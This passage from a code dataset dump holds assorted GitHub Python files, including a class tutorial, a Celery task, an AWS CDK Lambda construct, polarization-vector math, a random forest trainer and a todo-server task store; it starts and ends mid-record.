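# net = MLP(n_inpt=16, n_hiddens=[64, 64, 10])   # two hidden layers, 10 outputs
# out = net(torch.randn(8, 16))                  # -> shape (8, 10)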
\n","repo_name":"oxcsml/lie-transformer","sub_path":"eqv_transformer/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"20344656934","text":"# class Dog :\n#     kind = 'canine'\n#     def __init__(self,name) :\n#         self.name = name\n\n# my_dog = Dog('namu')\n# your_dog = Dog('gazi')\n# print(my_dog.kind)\n# print(your_dog.kind)\n# print(my_dog.name)\n# print(your_dog.name)\n\n\n# class Dog:\n#     # A value shared by every instance - hence the name: class variable\n#     tricks = []\n\n#     def __init__(self, name):\n#         self.name = name\n\n#     def add_trick(self, trick):\n#         self.tricks.append(trick)\n\n\n# my_dog = Dog('namu')\n# your_dog = Dog('gazi')\n\n# my_dog.add_trick('hello')\n# your_dog.add_trick('byebye')\n\n# print(my_dog.tricks)\n# print(your_dog.tricks)\n\n\nclass Dog:\n    def __init__(self, name):\n        self.name = name\n        self.tricks = []\n\n    def add_trick(self, trick):\n        self.tricks.append(trick)\n\n\nmy_dog = Dog('namu')\nyour_dog = Dog('gazi')\n\nmy_dog.add_trick('hello')\nyour_dog.add_trick('byebye')\n\nprint(my_dog.tricks)\nprint(your_dog.tricks)\n\n# print(help(str))\nprint(help(str.capitalize))\n\n# This is the form we actually write -\n# the shorthand\n'apple'.capitalize()\n\n# and this is how it really works underneath\nstr.capitalize('apple')\n\n# Procedural vs object-oriented\n# Seeing data as something that flows around -> seeing data as the center\n\n# Procedural\n# Data goes into a variable, and\ndef greeting(name) :\n    return f'hello, {name}'\n\nprint(greeting('harry'))\n\n# Object-oriented\n# The view where data is the center\nclass Person :\n    def __init__(self,name):\n        self.name = name\n\n    def greeting(self) :\n        return f'hello, {self.name}'\n\nmy_var = Person('harry')\nprint(my_var.greeting())","repo_name":"Alphanewbie/Django","sub_path":"python/python_class.py","file_name":"python_class.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18776930376","text":"\nfrom __future__ import absolute_import, unicode_literals\nfrom ADSWorker import app as app_module\nfrom adsputils import get_date, exceptions\nfrom ADSWorker.models import KeyValue\nfrom kombu import Queue\n\n# ============================= INITIALIZATION ==================================== #\n\napp = app_module.ADSWorkerPipelineCelery('ADSWorker')\nlogger = app.logger\n\n\napp.conf.CELERY_QUEUES = (\n    Queue('errors', app.exchange, routing_key='errors', durable=False, message_ttl=24*3600*5),\n    Queue('some-queue', app.exchange, routing_key='some-queue')\n)\n\n\n# ============================= TASKS ============================================= #\n\n@app.task(queue='some-queue')\ndef task_hello_world(message):\n    \"\"\"\n    Fetch a message from the queue. 
Save it into the database.\n And print out into a log.\n \n\n :param: message: contains the message inside the packet\n {\n 'name': '.....',\n 'start': 'ISO8801 formatted date (optional), indicates \n the moment we checked the orcid-service'\n }\n :return: no return\n \"\"\"\n \n if 'name' not in message:\n raise exceptions.IgnorableException('Received garbage: {}'.format(message))\n \n with app.session_scope() as session:\n kv = session.query(KeyValue).filter_by(key=message['name']).first()\n if kv is None:\n kv = KeyValue(key=message['name'])\n \n now = get_date()\n kv.value = now\n session.add(kv)\n session.commit()\n \n logger.info('Hello {key} we have recorded seeing you at {value}'.format(**kv.toJSON()))\n \n \n \n \n\nif __name__ == '__main__':\n app.start()","repo_name":"romanchyla/ADSWorker","sub_path":"ADSWorker/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"294031728","text":"\"\"\"Resource representing an AWS Account\"\"\"\nfrom typing import List, Type\n\nfrom botocore.client import BaseClient\n\nfrom altimeter.aws.resource.resource_spec import ScanGranularity, ListFromAWSResult, AWSResourceSpec\nfrom altimeter.aws.resource.unscanned_account import UnscannedAccountResourceSpec\nfrom altimeter.core.resource.resource_spec import ResourceSpec\nfrom altimeter.core.graph.field.scalar_field import ScalarField\nfrom altimeter.core.graph.schema import Schema\n\n\nclass AccountResourceSpec(AWSResourceSpec):\n \"\"\"Resource representing an AWS Account\"\"\"\n\n type_name = \"account\"\n service_name = \"sts\"\n scan_granularity = ScanGranularity.ACCOUNT\n schema = Schema(ScalarField(\"account_id\"))\n allow_clobber: List[Type[ResourceSpec]] = [UnscannedAccountResourceSpec]\n\n @classmethod\n def get_full_type_name(cls: Type[\"AccountResourceSpec\"]) -> str:\n return f\"{cls.provider_name}:{cls.type_name}\"\n\n @classmethod\n def list_from_aws(\n cls: Type[\"AccountResourceSpec\"], client: BaseClient, account_id: str, region: str\n ) -> ListFromAWSResult:\n \"\"\"This resource is somewhat synthetic, this method simply returns a dict of form\n {'account_arn': {account_dict}\"\"\"\n sts_account_id = client.get_caller_identity()[\"Account\"]\n if sts_account_id != account_id:\n raise ValueError(f\"BUG: sts detected account_id {sts_account_id} != {account_id}\")\n accounts = {f\"arn:aws::::account/{sts_account_id}\": {\"account_id\": sts_account_id}}\n return ListFromAWSResult(resources=accounts)\n\n @classmethod\n def generate_arn(\n cls: Type[\"AccountResourceSpec\"],\n resource_id: str,\n account_id: str = \"\",\n region: str = \"\",\n ) -> str:\n \"\"\"Generate an ARN for this resource\"\"\"\n return f\"arn:aws::::account/{resource_id}\"\n","repo_name":"tableau/altimeter","sub_path":"altimeter/aws/resource/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"31077595530","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 03 14:32:21 2015\n\n@author: Grantland\n\"\"\"\n\nfrom numpy import arctan2, sin, cos, arcsin, angle, sqrt, pi, exp\nfrom numpy import isclose, allclose\nfrom unitutils import unitize_a\n\ndef _isclosemod(a, b, atol=1E-5, mod=2*pi):\n \"\"\"\n Return whether two numbers (or arrays) are within atol of each other\n in the modulo space determined by mod.\n \"\"\"\n return (isclose(a%mod, b%mod, 
atol=atol)\n or isclose((a+atol)%mod, (b+atol)%mod, atol=atol))\n\nclass PolarizationVector:\n def __init__(self, *args):\n \"\"\"\n Essentially just an abstraction of complex numbers, representing the\n electric field at a specific point in space-time.\n Takes amplitude and wave phase in radians, or a complex number.\n \"\"\"\n if len(args) == 2:\n # Args are amplitude, phase\n self.pol = args[0]*(exp(1j*args[1]))\n elif len(args) == 1:\n # Arg is complex number\n self.pol = args[0]\n def __add__(self, other):\n a1 = self.amp\n a2 = other.amp\n p1 = self.phase\n p2 = other.phase\n amp_new = sqrt(a1**2 + a2**2 + 2*a1*a2*cos(p1-p2))\n phase_new = arctan2( a1*sin(p1) + a2*sin(p2), a1*cos(p1) + a2*cos(p2) )\n return PolarizationVector(amp_new, phase_new)\n def __sub__(self, other):\n a1 = self.amp\n a2 = -other.amp\n p1 = self.phase\n p2 = other.phase\n amp_new = sqrt(a1**2 + a2**2 + 2*a1*a2*cos(p1-p2))\n # arctan2 takes (y, x): sine terms first, exactly as in __add__\n phase_new = arctan2( a1*sin(p1) + a2*sin(p2), a1*cos(p1) + a2*cos(p2) )\n return PolarizationVector(amp_new, phase_new)\n def __mul__(self, num):\n \"\"\"Scalar multiplication.\"\"\"\n assert isinstance(num, (int, float, complex))\n amp_new = self.amp * abs(num)\n phase_new = self.phase + angle(num)\n return PolarizationVector(amp_new, phase_new)\n def __rmul__(self, num):\n \"\"\"Scalar multiplication.\"\"\"\n assert isinstance(num, (int, float, complex))\n amp_new = self.amp * abs(num)\n phase_new = self.phase + angle(num)\n return PolarizationVector(amp_new, phase_new)\n @property\n def power(self):\n \"\"\"\n Power is the square of the amplitude of the electric field.\n \"\"\"\n return self.amp**2\n @property\n def amp(self):\n return abs(self.pol)\n @property\n def phase(self):\n return angle(self.pol)\n def __eq__(self, other):\n \"\"\"\n Check if vector is essentially equal to another. This makes it\n easy to confirm that vector transformations are behaving as they\n should.\n \"\"\"\n if not _isclosemod(self.phase, other.phase):\n if _isclosemod(self.phase, other.phase+pi):\n # If they're pi out of phase, flip one of the amplitudes\n return isclose(self.amp, -other.amp, atol=1E-5)\n else:\n return False\n return isclose(self.amp, other.amp)\n def __ne__(self, other):\n #This isn't the default behavior because Python 2 doesn't derive __ne__ from __eq__\n return not self==other\n def __repr__(self):\n return \"Amplitude: {}\\nRelative phase: {}\".format(self.amp, self.phase)\n\nclass StokesVector:\n def __init__(self, *args):\n \"\"\"\n Takes either I, Q, U, V or two perpendicular PolarizationVectors,\n and returns the Stokes representation.\n \"\"\"\n if len(args) == 4:\n # stokes repr\n self.I = args[0]\n self.Q = args[1]\n self.U = args[2]\n self.V = args[3]\n self.phase = 0\n elif len(args) == 5:\n # stokes repr with phase\n self.I = args[0]\n self.Q = args[1]\n self.U = args[2]\n self.V = args[3]\n self.phase = args[4]\n elif len(args) == 2:\n x = args[0]\n y = args[1]\n self.I = x.power + y.power\n self.Q = x.power - y.power\n self.U = 2*x.amp*y.amp*(cos(x.phase-y.phase))\n self.V = -2*x.amp*y.amp*(sin(x.phase-y.phase))\n if isclose(x.amp, 0, atol=1E-5):\n if isclose(y.amp, 0, atol=1E-5):\n self.phase = 0\n else:\n \"\"\"\n If x is zero, use y phase.
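# The amplitude/phase update in __add__ above is just complex addition written
# out in polar form; a quick standalone check of that identity (NumPy only,
# values arbitrary):
import numpy as np
a1, p1, a2, p2 = 2.0, 0.3, 1.5, -1.1
direct = a1 * np.exp(1j * p1) + a2 * np.exp(1j * p2)
amp = np.sqrt(a1**2 + a2**2 + 2 * a1 * a2 * np.cos(p1 - p2))
phase = np.arctan2(a1 * np.sin(p1) + a2 * np.sin(p2),
                   a1 * np.cos(p1) + a2 * np.cos(p2))
assert np.isclose(direct, amp * np.exp(1j * phase))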
Since stokes vectors can't be\n modified except by casting to cartesian coordinates, the\n result of this check will be preserved.\n \"\"\"\n self.phase = y.phase\n else:\n self.phase = x.phase\n else:\n raise TypeError(\"Arguments must either be I, Q, U, V or two \" \\\n \"perpendicular PolarizationVectors.\")\n @property\n def cartesian(self):\n \"\"\"\n Returns the PolarizationTwoVector corresponding to the Stokes vector.\n \"\"\"\n tilt = arctan2(self.U, self.Q)/2\n if self.I == 0:\n elipticity = 0\n else:\n elipticity = arcsin(self.V/self.I)/2\n E_x = sqrt(self.I)*(cos(tilt)*cos(elipticity)-1j*sin(tilt)*sin(elipticity))\n E_y = sqrt(self.I)*(sin(tilt)*cos(elipticity)+1j*cos(tilt)*sin(elipticity))\n # Since pure Stokes vectors don't preserve phase, reconstruct from saved phase\n if isclose(E_x, 0, atol=1E-5):\n offset = self.phase-angle(E_y)\n else:\n offset = self.phase-angle(E_x)\n E_x = E_x*exp(1j*offset)\n E_y = E_y*exp(1j*offset)\n v_x = PolarizationVector(E_x)\n v_y = PolarizationVector(E_y)\n return PolarizationTwoVector(v_x, v_y)\n @property\n def vect(self):\n return [self.I, self.Q, self.U, self.V]\n @property\n def pol_angle(self):\n return (0.5*arctan2(self.U,self.Q))%(2*pi)\n def rot(self, angle):\n \"\"\"Returns rotated copy of self.\"\"\"\n return self.cartesian.rot(angle).stokes\n def _rot(self, angle):\n \"\"\"Rotates self by angle.\"\"\"\n self = self.rot(angle)\n def __add__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return (self.cartesian+other).stokes\n def __sub__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return (self.cartesian-other).stokes\n def __eq__(self, other):\n \"\"\"\n Returns whether or not two stokes vectors are essentially equal.\n \"\"\"\n if isinstance(other, StokesVector):\n return allclose([self.I, self.Q, self.U, self.V], \n [other.I, other.Q, other.U, other.V], atol=1E-5) and (\n _isclosemod(self.phase, other.phase) or isclose(self.I, 0, atol=1E-5))\n elif isinstance(other, PolarizationTwoVector):\n return self == other.stokes\n def __ne__(self, other):\n #This isn't the default behavior because \n return not self==other\n def __repr__(self):\n return \"I: {}, Q: {}, U: {}, V: {}, Phase: {}\".format(\n self.I, self.Q, self.U, self.V, self.phase) \n \nclass PolarizationTwoVector:\n \"\"\"\n This class is similar to a Stokes Vector,\n but designed to allow phase-offset vector addition.\n \"\"\"\n def __init__(self, vector_x, vector_y):\n self.v_x = vector_x\n self.v_y = vector_y\n def rot(self, angle):\n \"\"\"Return rotated copy of self.\"\"\"\n rad = unitize_a(angle)\n x_to_rot_x = self.v_x.amp*cos(rad)\n x_to_rot_y = -self.v_x.amp*sin(rad)\n y_to_rot_x = self.v_y.amp*sin(rad)\n y_to_rot_y = self.v_y.amp*cos(rad)\n new_x = PolarizationVector(x_to_rot_x, self.v_x.phase) + \\\n PolarizationVector(y_to_rot_x, self.v_y.phase)\n new_y = PolarizationVector(x_to_rot_y, self.v_x.phase) + \\\n PolarizationVector(y_to_rot_y, self.v_y.phase)\n return PolarizationTwoVector(new_x, new_y) \n def _rot(self, angle):\n \"\"\"Rotate self by angle.\"\"\"\n self = self.rot(angle)\n def __add__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return PolarizationTwoVector( self.v_x + other.v_x, \n self.v_y + other.v_y )\n def __sub__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return PolarizationTwoVector( self.v_x - other.v_x,\n self.v_y - other.v_y)\n @property\n def 
stokes(self):\n return StokesVector(self.v_x, self.v_y)\n @property\n def I(self):\n return self.stokes.I\n @property\n def Q(self):\n return self.stokes.Q\n @property\n def U(self):\n return self.stokes.U\n @property\n def V(self):\n return self.stokes.V\n def __eq__(self, other):\n if isinstance(other, PolarizationTwoVector):\n return self.v_x == other.v_x and self.v_y == other.v_y\n elif isinstance(other, StokesVector):\n return self.stokes == other\n def __ne__(self, other):\n #This isn't the default behavior because \n return not self==other\n def __repr__(self):\n return \"X:\\n{}\\nY:\\n{}\".format(self.v_x, self.v_y)\n","repo_name":"ghallsimpsons/characteristic-matrix","sub_path":"vector_types.py","file_name":"vector_types.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24584634927","text":"import argparse\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nimport utils\nfrom numpy.random import seed\nimport os\nimport time\nimport joblib\nimport json\n\nRANDOM_STATE = 42\nseed(RANDOM_STATE)\n\n# Grid for best parameter search\nPARAM_GRID = [{'n_estimators': [50, 70, 100, 130], 'max_features': [2,4,6,8,10], 'max_depth':[5,10,20,25,50]},\n {'bootstrap':[False],'n_estimators': [50, 70, 100, 130], 'max_features': [2,4,6,8,10],\n 'max_depth':[5,10,20,25,50]}]\n\ndef get_args():\n \"\"\"Function to parse arguments that are used to configure the training job\n \n Args:\n None: No explicit function arguments. Arguments are passed through command line\n \n Returns:\n args: parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(\"training hyperparameters\")\n \n parser.add_argument(\n '--target',\n type=str,\n default='delay',\n metavar='L',\n help=\"the label for training which can be either delay or delayed_traffic\"\n )\n\n parser.add_argument(\n '--nmir_files',\n type=str,\n nargs='*',\n metavar='F',\n help=\"pass filenames containing NMIR data for training, each seperated by space\"\n )\n parser.add_argument(\n '--test_size',\n type=float,\n default=0.3,\n metavar='TS',\n help=\"fraction of dataset to be used for testing\"\n )\n parser.add_argument(\n '--n_folds_cv',\n type=int,\n default=10,\n metavar='CV',\n help=\"number of folds for cross validation during grid search\"\n )\n parser.add_argument(\n '--custom_parameters',\n action='store_true',\n default=False,\n help=\"use this option to when you want to manually define hyperparameters for the model\"\n )\n parser.add_argument(\n '--n_estimators',\n type=int,\n default=None,\n metavar='NE',\n help=\"number of estimators for the Random Forest Estimator\"\n )\n parser.add_argument(\n '--max_features',\n type=int,\n default=None,\n metavar='MF',\n help=\"max number of features to be used from all the features for the Estimator\"\n )\n parser.add_argument(\n '--max_depth',\n type=int,\n default=None,\n metavar='MD',\n help=\"max depth for each Estimator\"\n )\n parser.add_argument(\n '--bootstrap',\n action='store_true',\n default=False,\n help=\"whether to use bootstrap during training\"\n )\n args = parser.parse_args()\n return args\n\ndef train_custom_rf_model(X_train, y_train, random_state, **rf_parameters):\n '''Function to train a Random Forest Regressor with defined hyperparameters\n passed as kwargs.\n\n Args:\n X_train (pd dataframe or np array): a 2D (training samples X 
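# For fully polarized light, the Stokes components defined in StokesVector above
# satisfy I^2 = Q^2 + U^2 + V^2. A small numeric check of that identity
# (standalone sketch; amplitudes and phases are arbitrary):
import numpy as np
ax, px, ay, py = 1.0, 0.2, 0.5, 1.0    # amplitude/phase of E_x and E_y
I = ax**2 + ay**2
Q = ax**2 - ay**2
U = 2 * ax * ay * np.cos(px - py)
V = -2 * ax * ay * np.sin(px - py)
assert np.isclose(I**2, Q**2 + U**2 + V**2)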
features) dataframe or a numpy array\n y_train (pd dataframe or np array): a single column target value for training\n random_state (int): seed to keep the results consistent\n **rf_parameters (**kwargs): the hyperparameters for Random forest Regressor\n \n Returns:\n rf_model: A Random Forest Regressor model fit on the training data\n '''\n rf_model = RandomForestRegressor(random_state=RANDOM_STATE, n_jobs=-1, **rf_parameters)\n rf_model.fit(X_train, y_train)\n return rf_model\n\ndef perform_grid_search(X_train, y_train, n_folds_cv, random_state):\n '''Function to perform a k-fold grid search and get model with best parameters from the grid.\n\n Args:\n X_train (pd dataframe or np array): a 2D (training samples X features) dataframe or a numpy array\n y_train (pd dataframe or np array): a single column target value for training\n n_folds_cv (int): number of folds for cross validation during grid search\n random_state (int): seed to keep the results consistent\n \n Returns:\n rf_model: A Random Forest Regressor model fit on the training data with the best parameters\n obtained from grid search\n '''\n rf_model = RandomForestRegressor()\n grid_search = GridSearchCV(rf_model, PARAM_GRID, cv=n_folds_cv, scoring='neg_mean_absolute_error', n_jobs=-1, verbose=1)\n grid_search.fit(X_train, y_train)\n rf_model = grid_search.best_estimator_.fit(X_train, y_train)\n return rf_model\n\ndef save_rf_model(rf_model, job_dir):\n joblib.dump(rf_model, os.path.join(utils.OUTPUT_DIR, job_dir, 'rf_model.save'))\n\ndef save_rf_model_metadata(rf_model, job_dir):\n metadata_save_path = os.path.join(utils.OUTPUT_DIR, job_dir, \"rf_model_metadata.json\")\n with open(metadata_save_path, 'w') as outfile:\n json.dump(rf_model.get_params(), outfile)\n\ndef train(job_dir, train_filenames, target='delay', test_size=0.3, n_folds_cv=10, **rf_parameters):\n '''Function to train a RF model. 
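# A toy smoke test for train_custom_rf_model as defined above (the synthetic
# data and hyperparameter values are illustrative, not from the repository):
import numpy as np
X_toy = np.random.rand(100, 10)
y_toy = np.random.rand(100)
model = train_custom_rf_model(X_toy, y_toy, random_state=42,
                              n_estimators=50, max_depth=5)
print(model.predict(X_toy[:3]))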
The hyperparameters are tuned using gridsearch if enabled\n '''\n print(\"Reading the raw data.....\", flush=True)\n raw_df = pd.read_csv(os.path.join(utils.NMIR_DATA_DIR, train_filenames[0]))\n for f in range(1, len(train_filenames), 1):\n join_df = pd.read_csv(os.path.join(utils.NMIR_DATA_DIR, train_filenames[f]))\n raw_df = pd.concat((raw_df, join_df), axis=0).reset_index(drop=True)\n\n print(\"Transforming the data.....\", flush=True)\n daywise = utils.transform_to_daywise_basic(raw_df)\n X = daywise.drop(columns=['Date', 'ATFM Delay (min)', 'MP Delayed Traffic'])\n if target == 'delay':\n y = daywise['ATFM Delay (min)']\n else:\n y = daywise['MP Delayed Traffic']\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=RANDOM_STATE)\n\n if rf_parameters:\n print(\"Training RF regressor with the passed hyper-parameters.....\", flush=True)\n rf_model = train_custom_rf_model(X_train, y_train, random_state=RANDOM_STATE, **rf_parameters)\n else:\n print(\"Performing grid search to find the best hyper-parameters.....\", flush=True)\n rf_model = perform_grid_search(X_train, y_train, n_folds_cv, random_state=RANDOM_STATE)\n \n y_pred_train = rf_model.predict(X_train)\n y_pred_test = rf_model.predict(X_test)\n utils.print_metrics(y_train, y_pred_train, y_test, y_pred_test, target)\n\n print(\"Saving training results, metadata, and the model\", flush=True)\n \n utils.save_line_plots(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n utils.save_scatter_plots(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n utils.save_predictions(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n save_rf_model(rf_model, job_dir)\n save_rf_model_metadata(rf_model, job_dir)\n utils.save_training_file_info(train_filenames, job_dir)\n utils.save_metrics_detailed(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n utils.register_job_log(job_dir, y_train, y_pred_train, y_test, y_pred_test)\n \nif __name__ == \"__main__\":\n args = vars(get_args())\n if args['nmir_files'] is None:\n raise FileNotFoundError(\"Please pass the names of the NMIR files that are to be used for training\")\n rf_parameters = {}\n for par in ['n_estimators', 'max_features', 'max_depth', 'bootstrap']:\n if args[par]:\n rf_parameters[par] = args[par]\n timestr = time.strftime(\"%Y%m%d-%H%M%S\") # to make a folder where job related files are saved\n job_dir = 'RF_' + timestr\n utils.create_job_dir(job_dir)\n if args['custom_parameters']:\n train(job_dir, train_filenames=args['nmir_files'], target=args['target'], test_size=args['test_size'], **rf_parameters)\n else:\n train(job_dir, train_filenames=args['nmir_files'], target=args['target'], test_size=args['test_size'], n_folds_cv=args['n_folds_cv'])","repo_name":"brianpinto91/atfm-delay-prediction","sub_path":"training/rf_trainer.py","file_name":"rf_trainer.py","file_ext":"py","file_size_in_byte":7945,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34281651843","text":"from flask import Flask, render_template\nimport sqlite3, db1, os, time\napp = Flask(__name__)\n#app.config['SERVER_NAME'] = '10.0.0.95:5000'\n#app.root_path = os.path.dirname(os.path.abspath(__file__))\nmessage = '
Data is loading. Please refresh the page in a couple of minutes.
'\n@app.route('/')\ndef read_sqlite_table():\n # items=db1.operators('read_tables')\n # return render_template('mainpage.html',items=items) \n items=db1.operators('read_tables')\n dateStr = db1.dateStr\n if(items != None):\n if(len(items)>20): \n return render_template('mainpage.html',items=items, dateStr=dateStr)\n else:\n return message\n else:\n return message\n#$env:FLASK_APP = \"run.py\"","repo_name":"shadevil/atmo_parser","sub_path":"old parser/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878829928","text":"#link : https://codeforces.com/problemset/problem/879/A\n#author : Mohamed Ibrahim\n\nn=int(input())\nx=0\nfor i in range(n):\n s,d=map(int,input().split())\n if s>x:\n x=s\n else:\n x=x-(x-s)%d+d\nprint(x)\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"CodeForces/A. Borya's Diagnosis.py","file_name":"A. Borya's Diagnosis.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"38795539052","text":"class Solution:\n def compareVersion(self, version1: str, version2: str) -> int:\n v1 = version1.split(\".\")\n v2 = version2.split(\".\")\n len1, len2 = len(v1), len(v2)\n m = abs(len1 - len2)\n if len1 > len2:\n v2 += [0] * m\n elif len1 < len2:\n v1 += [0] * m\n for i in range(len(v1)):\n x = int(v1[i])\n y = int(v2[i])\n if x > y:\n return 1\n elif x < y:\n return -1\n return 0\n","repo_name":"saycmily/vtk-and-python","sub_path":"leecode/1-500/101-200/165-比较版本号.py","file_name":"165-比较版本号.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32173775869","text":"import os\nimport sys\nimport shutil\n\nfrom constructs import Construct\nfrom aws_cdk import (\n aws_iam as iam,\n aws_lambda as _lambda,\n)\n\nclass ContactLambda(Construct):\n\n @property\n def contact_lambda(self):\n return self._contact_lambda\n\n def __init__(self, scope: Construct, id: str, account: str, region: str, **kwargs):\n super().__init__(scope, id, **kwargs)\n\n # IAM role for the lambda function\n lambdaRole = iam.Role(\n self, \"AWSomeContactRole\",\n assumed_by=iam.ServicePrincipal(\"lambda.amazonaws.com\")\n )\n lambdaRole.add_to_policy(iam.PolicyStatement(\n actions=[\"logs:CreateLogGroup\"],\n resources=[f\"arn:aws:logs:{region}:{account}:*\"],\n ))\n lambdaRole.add_to_policy(\n iam.PolicyStatement(\n actions=[\n \"logs:CreateLogStream\",\n \"logs:PutLogEvents\",\n ],\n resources=[\n f\"arn:aws:logs:{region}:{account}:log-group:/aws/lambda/AWSomeStack*:*\",\n f\"arn:aws:logs:{region}:{account}:log-group:/aws/lambda/Deploy-AWSomeStack*:*\",\n ],\n ),\n )\n lambdaRole.add_to_policy(\n iam.PolicyStatement(\n actions=[\n \"ssm:GetParameter\",\n \"ssm:GetParameters\",\n \"ssm:ListTagsForResource\",\n ],\n resources=[f\"arn:aws:ssm:{region}:{account}:parameter/freelance/*\"],\n ),\n )\n lambdaRole.add_to_policy(\n iam.PolicyStatement(\n actions=[\n \"ses:SendEmail\",\n \"ses:SendRawEmail\",\n ],\n resources=[\"*\"],\n ),\n )\n\n if \"pytest\" in sys.modules:\n # Create dummy file for tests\n zip_file = '../contact/contact.zip'\n os.system('touch ' + zip_file)\n else:\n # Compile Go project\n os.system('cd ../contact && GOOS=linux GOARCH=amd64 go build .')\n # Compress binary\n zip_file = shutil.make_archive('../contact/contact', 'zip', '../contact', 
'contact')\n\n # Lambda function\n cwd = os.getcwd()\n self._contact_lambda = _lambda.Function(\n self, \"AWSomeContactLambda\",\n runtime=_lambda.Runtime.GO_1_X,\n code=_lambda.Code.from_asset(os.path.join(cwd, zip_file)),\n handler='contact',\n role=lambdaRole,\n )\n","repo_name":"awsome-expert/awsome-expert","sub_path":"cdk/awsome/awsome_stack/contact_lambda.py","file_name":"contact_lambda.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2754346081","text":"from rest_framework import serializers\n\nfrom TaskMan.models import Tasks\n\n\nclass TasksSerializer(serializers.ModelSerializer):\n dead_line_date = serializers.DateField(format=None, input_formats=None)\n class Meta:\n model = Tasks\n fields = ('id', 'user', 'task', 'created_date', 'dead_line_date', 'is_completed')\n\n","repo_name":"ramchauhan/task_manager","sub_path":"TaskMan/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18086278195","text":"import abc\nimport argparse\nimport json\nimport re\nimport psycopg2\nfrom flask import (\n Flask,\n request,\n make_response,\n )\n\napp = Flask(__name__)\n\nclass TaskStore(metaclass=abc.ABCMeta):\n @abc.abstractmethod\n def add(self, summary, description):\n pass\n \n @abc.abstractmethod\n def get_task(self, task_id):\n pass\n\n @abc.abstractmethod\n def delete_task(self, task_id):\n pass\n\n @abc.abstractmethod\n def update_task(self, task_id, summary, description):\n pass\n\n @abc.abstractmethod\n def all_tasks(self):\n pass\n\nclass MemoryTaskStore(TaskStore):\n def __init__(self):\n self._init_store()\n\n def new_id(self):\n id = self._last_id\n self._last_id += 1\n return id\n\n def add(self, summary, description):\n task_id = self.new_id()\n task = {\n 'id': task_id,\n 'summary': summary,\n 'description': description,\n }\n self.tasks[task_id] = task\n return task_id\n\n def get_task(self, task_id):\n try:\n return self.tasks[task_id]\n except KeyError:\n return None\n\n def delete_task(self, task_id):\n try:\n del self.tasks[task_id]\n return True\n except KeyError:\n return False\n \n def update_task(self, task_id, summary, description):\n try:\n task = self.tasks[task_id]\n except KeyError:\n return False\n task['summary'] = summary\n task['description'] = description\n return True\n\n def all_tasks(self):\n return iter(self.tasks.values())\n\n def clear(self):\n cleared = len(self.tasks)\n self._init_store()\n return cleared\n\n def _init_store(self):\n self._last_id = 0\n self.tasks = {}\n \n\nclass DbTaskStore(TaskStore):\n def __init__(self):\n self.dsn = 'dbname=todoserver user=www-data'\n\n def add(self, summary, description):\n insert_stmt = 'INSERT INTO tasks (summary, description) VALUES (%s, %s) RETURNING id'\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(insert_stmt, (summary, description))\n task_id = cur.fetchone()[0]\n return task_id\n\n def get_task(self, task_id: int):\n cols = (\n 'id',\n 'summary',\n 'description',\n )\n select_stmt = 'select ' + ','.join(cols) + ' from tasks WHERE id = %s'\n with psycopg2.connect(self.dsn) as conn:\n with conn.cursor() as cur:\n cur.execute(select_stmt, (task_id,))\n row = cur.fetchone()\n if row is None:\n return None\n return dict(zip(cols, row))\n\n def update_task(self, task_id, summary, description):\n fields = [\n summary,\n 
